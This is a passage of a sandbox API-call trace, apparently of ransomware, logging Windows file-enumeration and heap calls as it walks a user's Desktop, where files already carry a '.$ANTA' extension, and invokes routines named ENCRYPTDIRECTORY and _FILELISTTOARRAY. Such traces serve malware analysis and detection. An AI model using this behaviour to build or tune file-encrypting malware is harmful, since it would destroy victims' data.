lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0128.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0128.814] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0128.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0128.814] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x139dfea4, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x139dfea4, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x13ac4cc2, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x50d0, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="9IrmcPpBnuYGc4Yelr9W.mp4.$ANTA", cAlternateFileName="9IRMCP~1.$AN")) returned 1 [0128.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0128.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0128.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0128.814] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13b838ab, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x13b838ab, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x13bf5fd9, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x8480, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="9PZJqif.m4a.$ANTA", cAlternateFileName="9PZJQI~1.$AN")) returned 1 [0128.814] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13c8e894, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x13c8e894, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x13d0351b, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x8f00, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="A2BeonpxV2cn0bIC.png.$ANTA", cAlternateFileName="A2BEON~1.$AN")) returned 1 [0128.814] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13de5e96, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x13de5e96, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x140221bf, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x17a30, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="AQwif8E74Z.avi.$ANTA", cAlternateFileName="AQWIF8~1.$AN")) returned 1 [0128.814] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x142123a8, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x142123a8, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x14238548, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x97b0, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="aYyiLdyhoIdALfth0-Sh.csv.$ANTA", cAlternateFileName="AYYILD~1.$AN")) returned 1 [0128.814] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143433fb, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x143433fb, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x1444e649, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0xbca0, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="aZ 2dgF6.ppt.$ANTA", cAlternateFileName="AZ2DGF~1.$AN")) returned 1 [0128.815] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1474933b, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x1474933b, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x14dd7a22, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x15e80, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="BbxrQ2nHZPP_A.jpg.$ANTA", cAlternateFileName="BBXRQ2~1.$AN")) returned 1 [0128.815] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ef9b, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x14f2ef9b, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x15013d8e, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x5c30, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="bUb qc_SLq8O.mp4.$ANTA", cAlternateFileName="BUBQC_~1.$AN")) returned 1 [0128.815] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1511ed4a, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x1511ed4a, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x151e0a61, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x156c0, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="BwLCz.jpg.$ANTA", cAlternateFileName="BWLCZJ~1.$AN")) returned 1 [0128.815] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1524ffcb, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x1524ffcb, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x152e89fc, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x18e70, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="CgH9zawVTY35raopEyZt.mp3.$ANTA", cAlternateFileName="CGH9ZA~1.$AN")) returned 1 [0128.815] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1535b24e, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x1535b24e, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x153cd8ad, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x8f30, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="cSg8 emhaX_r.ots.$ANTA", cAlternateFileName="CSG8EM~1.$AN")) returned 1 [0128.815] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15419e87, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x15419e87, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x1548c443, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x17910, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="CtmEppS 7Ks0.swf.$ANTA", cAlternateFileName="CTMEPP~1.$AN")) returned 1 [0128.815] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15524e4f, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x15524e4f, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x155712b6, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x120, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="desktop.ini.$ANTA", cAlternateFileName="DESKTO~1.$AN")) returned 1 [0128.815] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x155bd7c8, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x155bd7c8, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x1562fd3c, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0xa870, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="f9lcZFridHfs.rtf.$ANTA", cAlternateFileName="F9LCZF~1.$AN")) returned 1 [0128.815] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x156c894c, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x156c894c, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x15787690, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x5ae0, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="gp1QElBYzj-bWq.bmp.$ANTA", cAlternateFileName="GP1QEL~1.$AN")) returned 1 [0128.815] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15a35ee7, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x15a35ee7, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x15af49a2, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x7f90, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="I4IMK8uPkmw_W.mp3.$ANTA", cAlternateFileName="I4IMK8~1.$AN")) returned 1 [0128.815] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15d56e1d, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x15d56e1d, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x15da33c5, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0xd6c0, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="jHCQtc-oyo Hp07enJ.ots.$ANTA", cAlternateFileName="JHCQTC~1.$AN")) returned 1 [0128.815] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15f6d065, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x15f6d065, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x16051e42, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x18990, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="kLTeW7.mp3.$ANTA", cAlternateFileName="KLTEW7~1.$AN")) returned 1 [0128.815] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1616381d, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x1616381d, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x161a9323, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x4560, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="LdhR.mkv.$ANTA", cAlternateFileName="LDHRMK~1.$AN")) returned 1 [0128.815] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1621b8da, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x1621b8da, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x16267f71, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x17e00, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="mA8Gl8nzr8.xlsx.$ANTA", cAlternateFileName="MA8GL8~1.$AN")) returned 1 [0128.815] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1639933e, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x1639933e, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x1653cbd2, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x6e50, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="MDF9dFhi.gif.$ANTA", cAlternateFileName="MDF9DF~1.$AN")) returned 1 [0128.816] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16ceab80, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x16ceab80, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x16dcfc05, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x86f0, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="OD9hoNYV uW0IIj2du.bmp.$ANTA", cAlternateFileName="OD9HON~1.$AN")) returned 1 [0128.817] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16e6839b, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x16e6839b, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x16eda921, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0xdbd0, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="oIFaH-1_nryv.mp3.$ANTA", cAlternateFileName="OIFAH-~1.$AN")) returned 1 [0128.817] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16f995a8, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x16f995a8, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x17031ea7, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x144a0, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="QKxk.mp3.$ANTA", cAlternateFileName="QKXKMP~1.$AN")) returned 1 [0128.817] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x170ca917, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x170ca917, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x171893cc, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x16d40, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="Tj494Ho-BBcDUp1CA.mkv.$ANTA", cAlternateFileName="TJ494H~1.$AN")) returned 1 [0128.817] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1729457f, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x1729457f, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x1748435b, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0xff70, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="tK8Qmak8ns0qz6I3UcG.wav.$ANTA", cAlternateFileName="TK8QMA~1.$AN")) returned 1 [0128.818] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x175fc563, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x175fc563, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x176c89a0, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x11890, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="uaY41mSq.csv.$ANTA", cAlternateFileName="UAY41M~1.$AN")) returned 1 [0128.818] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1578ca90, ftCreationTime.dwHighDateTime=0x1d5f0cc, ftLastAccessTime.dwLowDateTime=0xe86e6710, ftLastAccessTime.dwHighDateTime=0x1d5e696, ftLastWriteTime.dwLowDateTime=0xe86e6710, ftLastWriteTime.dwHighDateTime=0x1d5e696, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="uI6dJwkjdmY9", cAlternateFileName="UI6DJW~1")) returned 1 [0128.818] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1799da93, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x1799da93, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x17ce4d98, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0xa50, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="V_VfUPg6JY sjdteIA3.gif.$ANTA", cAlternateFileName="V_VFUP~1.$AN")) returned 1 [0128.818] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17fb99fb, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x17fb99fb, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x18006065, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0xdaf0, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="WMWtJGFcI6Q-91k75WQc.wav.$ANTA", cAlternateFileName="WMWTJG~1.$AN")) returned 1 [0128.818] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1853d1b7, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x1853d1b7, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x187c594a, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x7ef0, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="WrCkWcj.m4a.$ANTA", cAlternateFileName="WRCKWC~1.$AN")) returned 1 [0128.818] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18a9a617, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x18a9a617, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x18b5912a, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x36b0, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="xV3SDT.ots.$ANTA", cAlternateFileName="XV3SDT~1.$AN")) returned 1 [0128.818] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18cd679a, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x18cd679a, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x18d22f10, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x33a0, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="_uPhYhD.png.$ANTA", cAlternateFileName="_UPHYH~1.$AN")) returned 1 [0128.818] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x43e2540, ftCreationTime.dwHighDateTime=0x144eff0, ftLastAccessTime.dwLowDateTime=0x295a83, ftLastAccessTime.dwHighDateTime=0x43e2540, ftLastWriteTime.dwLowDateTime=0x43e9578, ftLastWriteTime.dwHighDateTime=0x356310, nFileSizeHigh=0x29c786, nFileSizeLow=0x1809934, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="", cAlternateFileName="мńဓ+\x10")) returned 0 [0128.818] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0128.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|uI6dJwkjdmY9", cchCount1=13, lpString2="", cchCount2=0) returned 3 [0128.819] CharUpperBuffW (in: lpsz="ENCRYPTDIRECTORY", cchLength=0x10 | out: lpsz="ENCRYPTDIRECTORY") returned 0x10 [0128.819] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0128.819] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9")) returned 0x10 [0128.819] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\*", lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1578ca90, ftCreationTime.dwHighDateTime=0x1d5f0cc, ftLastAccessTime.dwLowDateTime=0xe86e6710, ftLastAccessTime.dwHighDateTime=0x1d5e696, ftLastWriteTime.dwLowDateTime=0xe86e6710, ftLastWriteTime.dwHighDateTime=0x1d5e696, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca838, cFileName=".", cAlternateFileName="")) returned 0x41ac100 [0128.819] FindNextFileW (in: hFindFile=0x41ac100, lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1578ca90, ftCreationTime.dwHighDateTime=0x1d5f0cc, ftLastAccessTime.dwLowDateTime=0xe86e6710, ftLastAccessTime.dwHighDateTime=0x1d5e696, ftLastWriteTime.dwLowDateTime=0xe86e6710, ftLastWriteTime.dwHighDateTime=0x1d5e696, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca838, cFileName="..", cAlternateFileName="")) returned 1 [0128.820] FindNextFileW (in: hFindFile=0x41ac100, lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce390d0, ftCreationTime.dwHighDateTime=0x1d5efbf, ftLastAccessTime.dwLowDateTime=0x4f30df70, ftLastAccessTime.dwHighDateTime=0x1d5ed2a, ftLastWriteTime.dwLowDateTime=0x4f30df70, ftLastWriteTime.dwHighDateTime=0x1d5ed2a, nFileSizeHigh=0x0, nFileSizeLow=0x8d0a, dwReserved0=0x0, dwReserved1=0x43ca838, cFileName="-ibxuw5BT.mp4", cAlternateFileName="-IBXUW~1.MP4")) returned 1 [0128.820] FindNextFileW (in: hFindFile=0x41ac100, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7c93870, ftCreationTime.dwHighDateTime=0x1d5f0f3, ftLastAccessTime.dwLowDateTime=0x510b6f50, ftLastAccessTime.dwHighDateTime=0x1d5f0ad, ftLastWriteTime.dwLowDateTime=0x510b6f50, ftLastWriteTime.dwHighDateTime=0x1d5f0ad, nFileSizeHigh=0x0, nFileSizeLow=0x7203, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="1aQmLq17nlG1P.bmp", cAlternateFileName="1AQMLQ~1.BMP")) returned 1 [0128.820] FindNextFileW (in: hFindFile=0x41ac100, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4d3d00, ftCreationTime.dwHighDateTime=0x1d5efef, ftLastAccessTime.dwLowDateTime=0x634a8dc0, ftLastAccessTime.dwHighDateTime=0x1d5e5fb, ftLastWriteTime.dwLowDateTime=0x634a8dc0, ftLastWriteTime.dwHighDateTime=0x1d5e5fb, nFileSizeHigh=0x0, nFileSizeLow=0xf43e, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="5N nlGCuCJHLr.gif", cAlternateFileName="5NNLGC~1.GIF")) returned 1 [0128.820] FindNextFileW (in: hFindFile=0x41ac100, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4afc3bf0, ftCreationTime.dwHighDateTime=0x1d5e6d3, ftLastAccessTime.dwLowDateTime=0x36306f20, ftLastAccessTime.dwHighDateTime=0x1d5f088, ftLastWriteTime.dwLowDateTime=0x36306f20, ftLastWriteTime.dwHighDateTime=0x1d5f088, nFileSizeHigh=0x0, nFileSizeLow=0x2b91, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="5qUH.doc", cAlternateFileName="")) returned 1 [0128.820] FindNextFileW (in: hFindFile=0x41ac100, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6effd0b0, ftCreationTime.dwHighDateTime=0x1d5ecf1, ftLastAccessTime.dwLowDateTime=0xc3171260, ftLastAccessTime.dwHighDateTime=0x1d5f040, ftLastWriteTime.dwLowDateTime=0xc3171260, ftLastWriteTime.dwHighDateTime=0x1d5f040, nFileSizeHigh=0x0, nFileSizeLow=0x823f, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="b029yG4LTNtgmmqX_G.odp", cAlternateFileName="B029YG~1.ODP")) returned 1 [0128.820] FindNextFileW (in: hFindFile=0x41ac100, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, 